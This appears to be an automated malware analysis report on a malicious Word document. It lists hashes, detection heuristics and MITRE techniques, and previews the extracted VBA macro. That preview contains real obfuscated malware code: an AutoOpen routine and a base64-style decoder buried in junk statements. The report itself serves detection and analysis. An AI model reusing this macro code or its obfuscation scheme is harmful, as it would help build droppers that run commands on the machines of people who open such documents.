Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 130bd7967b29afea…

MALICIOUS

Office (OLE)

155.0 KB Created: 2017-05-31 13:39:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 77efe8bdd39d86f3d25d427a37964ea7 SHA-1: ecb4900b46e440ccd26c058fd1a7785fcf27c809 SHA-256: 130bd7967b29afea66711a579e5e593c6f22676374ba47f045957025f91f822b
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses a Shell() call, indicating an attempt to execute arbitrary commands. This is strongly suggestive of a downloader or dropper functionality, where the macro is used to fetch and execute a secondary payload. The ClamAV detection name 'Doc.Macro.Valyria-6327969-0' further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Macro.Valyria-6327969-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Valyria-6327969-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23796 bytes
SHA-256: a7a2a436ff4ddedafc7649fc1c297b9a7c84b92e946217c960465665b61a636f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bdIFv"
Sub AutoOpen()
Dim tVMuS As Integer
tVMuS = 335 - 169
If tVMuS <> 39281 Then
ct6CvrLM = -11527
Else
upfdqHX = 22409.432849937
End If
Dim v6fJBw As Integer
v6fJBw = 335 - 169
If v6fJBw > 39281 Then
PF132 = False
Else
dxyIbmnV = 2969.1845256388
End If
Dim myjwYl3RW As Integer
myjwYl3RW = 335 - 169
If myjwYl3RW = 39281 Then
idqb1g = 216
Else
RbVnW7 = 0
End If
RkCUaI
Dim jDNvz0Z As Integer
jDNvz0Z = 418 - 368
If jDNvz0Z <> 41244 Then
DxEui = AYIc6ng
Else
IV29b = AYIc6ng
End If
Dim ioAtJbH As Integer
ioAtJbH = 418 - 368
If ioAtJbH <> 41244 Then
NhOvVmcLa = 180
Else
ZP9iS = 46969.270308115
End If
Dim F5iHv As Integer
F5iHv = 418 - 368
If F5iHv < 41244 Then
tCFHYkStW = True
Else
g4XDA = -1581222382
End If
Dim BZFKO6uG As Integer
BZFKO6uG = 6812 / 524
If BZFKO6uG > 62619 Then
Z251hb6B = HkguNU
Else
ALVtI2i8 = False
End If
Dim fCBeM97 As Integer
fCBeM97 = 6812 / 524
If fCBeM97 <> 62619 Then
vlKjNWsZV = 67
Else
P3J9vUdh = 24033
End If

End Sub

Attribute VB_Name = "nPI8yK"
Private Const qdvLKk = 16711680
Private Const l3oul4B = 65280
Private Const CEAjCc = 255
Private Const ndyoCX = 262144
Private Const FGEdzILX = 4096
Private Const S5hFk = 64
Private Const F7Utn = 256
Private Const BHG8NrlTM = 65536
Public Function Sn8vfim(gh4RuE7Gk As String) As String
Dim UaWXj() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
Dim EHz2XJ As Integer
EHz2XJ = 277 - 206
If EHz2XJ = 44007 Then
tfRyu4dHn = 45156.819918107
Else
FCtnE = 20544
End If
Dim IGELjYDvs As Integer
IGELjYDvs = 277 - 206
If IGELjYDvs < 44007 Then
BBk6Z0F = 29407
Else
EfVUsB = 42522.117922804
End If
Dim MUaWF As Integer
MUaWF = 277 - 206
If MUaWF > 44007 Then
fFCys = 32283.228682626
Else
GwnEWz = 92
End If
gh4RuE7Gk = Replace(gh4RuE7Gk, vbCr, vbNullString)
Dim NwRTcJ8j As Integer
NwRTcJ8j = 90 + 88
If NwRTcJ8j > 35021 Then
ASJGxB = 9481.8215327367
Else
QzWlB = 4475
End If
Dim Iim9h8GN As Integer
Iim9h8GN = 90 + 88
If Iim9h8GN <> 35021 Then
EiVPHfsd = BPFIkCS3L
Else
VUWp5gh = 13062
End If
Dim zLIKGS90 As Integer
zLIKGS90 = 90 + 88
If zLIKGS90 < 35021 Then
rjUNO = 39176.998861444
Else
THhN3kL = -26841
End If
Dim DOLWZ As Integer
DOLWZ = -1 + 130
If DOLWZ > 45368 Then
GvoS6cpKm = 30
Else
XeBIjK0 = 3342.1421932239
End If
Dim eC1gyln As Integer
eC1gyln = -1 + 130
If eC1gyln < 45368 Then
AtaMZ6P = 560.51457941202
Else
s0xn23PA = -16715
End If
Dim PMZFY8Qwp As Integer
PMZFY8Qwp = -1 + 130
If PMZFY8Qwp > 45368 Then
huxK0X = False
Else
u9xPmiy = False
End If
gh4RuE7Gk = Replace(gh4RuE7Gk, vbLf, vbNullString)
Dim zqY6m As Integer
zqY6m = 4896 / 32
If zqY6m <> 40267 Then
Kwq9bQs1r = 18168.426158892
Else
sc9RA2 = 120
End If
Dim KNkDm As Integer
KNkDm = 4896 / 32
If KNkDm <> 40267 Then
ZYqK21mx = True
Else
W1j42TWf7 = 43555.157577191
End If
Dim puaGbdhM As Integer
puaGbdhM = 306 - 179
If puaGbdhM > 47453 Then
MvfHp = 0
Else
ho6zpXs1E = 0
End If
Dim P7J4yS As Integer
P7J4yS = 306 - 179
If P7J4yS <> 47453 Then
uDTjtx = 26706.771965411
Else
Nuwif = False
End If
lTemp = Len(gh4RuE7Gk) Mod 4
Dim B4glsh As Integer
B4glsh = 154 + 8
If B4glsh > 58054 Then
IYMCl4 = 50818.27949097
Else
Gh3gZGzM = 11957
End If
Dim vi43L0e2 As Integer
vi43L0e2 = 154 + 8
If vi43L0e2 < 58054 Then
IHMu7 = 62083.387963299
Else
ddmxc = 0
End If
Dim osdWV0a As Integer
osdWV0a = 14740 / 110
If osdWV0a <> 39059 Then
QBcZ0 = 0
Else
VxPTVOM = 39114.756126649
End If
Dim bChSr As Integer
bChSr = 14740 / 110
If bChSr > 39059 Then
mEvl3asw = 4827.6607343674
Else
dafPg = -1903
... (truncated)